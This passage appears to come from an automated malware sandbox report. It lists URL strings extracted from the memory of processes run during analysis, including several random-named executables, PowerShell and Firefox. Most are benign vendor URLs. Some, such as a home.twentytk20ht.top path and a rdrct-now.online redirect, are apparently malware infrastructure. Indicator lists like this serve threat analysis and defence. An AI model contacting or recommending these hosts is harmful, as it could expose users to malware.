                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e12564.dspb.akamaiedge.net
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC524D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                              Source: svchost.exe, 00000017.00000003.2851825660.0000019CC5291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/StoreAppList.Light.png
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/StoreLogo.Light.png
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Resources/app.Light.ico
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/app.light.ico
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/storeapplist.light.png
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/resources/storelogo.light.png
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.00000000023DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                              Source: 932bb971c3.exe, 00000013.00000003.2810515923.0000000001AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQ
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                              Source: ed7d415177.exe, 0000001E.00000003.3529309223.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3653308525.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3445606549.000000000177D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coPa
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3623665169.000002238BC40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3676285099.000002238E037000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                              Source: powershell.exe, 0000000E.00000002.2643535669.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2706333569.0000000005FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: powershell.exe, 00000011.00000002.2690416299.0000000005095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2688444765.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/StoreInstaller.Models
                              Source: powershell.exe, 00000011.00000002.2713514508.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsof
                              Source: powershell.exe, 0000000E.00000002.2638900378.0000000004F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2690416299.0000000005095000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2638900378.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2690416299.0000000004F41000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 0000000E.00000002.2638900378.0000000004F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2690416299.0000000005095000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%s
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                              Source: powershell.exe, 00000011.00000002.2690416299.0000000005095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2688444765.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: c9692f9101.exe, 00000014.00000003.3634688996.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638199431.0000000005671000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3635238092.000000000595F000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3638728492.0000000005612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                              Source: firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                              Source: firefox.exe, 00000030.00000002.3676285099.000002238E082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/sessionstore/Pri
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                              Source: firefox.exe, 00000030.00000003.3313163016.000002238E377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312075480.000002238E31F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3311874121.000002238E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/internal:privateBrowsingAllowedprincipalToInherit_base64Wikipedia
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.orgpictureinpicture.toggle_enabledError:
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                              Source: powershell.exe, 0000000E.00000002.2638900378.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2690416299.0000000004F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.accounts.firefox.com/v1
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                              Source: 85746525a0.exe, 0000000B.00000003.2759360034.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                              Source: ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                              Source: firefox.exe, 00000030.00000002.3676285099.000002238E06F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                              Source: firefox.exe, 00000030.00000002.3676285099.000002238E037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1378427
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://content.cdn.mozilla.net
                              Source: 85746525a0.exe, 0000000B.00000003.2759360034.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                              Source: ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                              Source: powershell.exe, 00000011.00000002.2706333569.0000000005FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000011.00000002.2706333569.0000000005FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000011.00000002.2706333569.0000000005FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
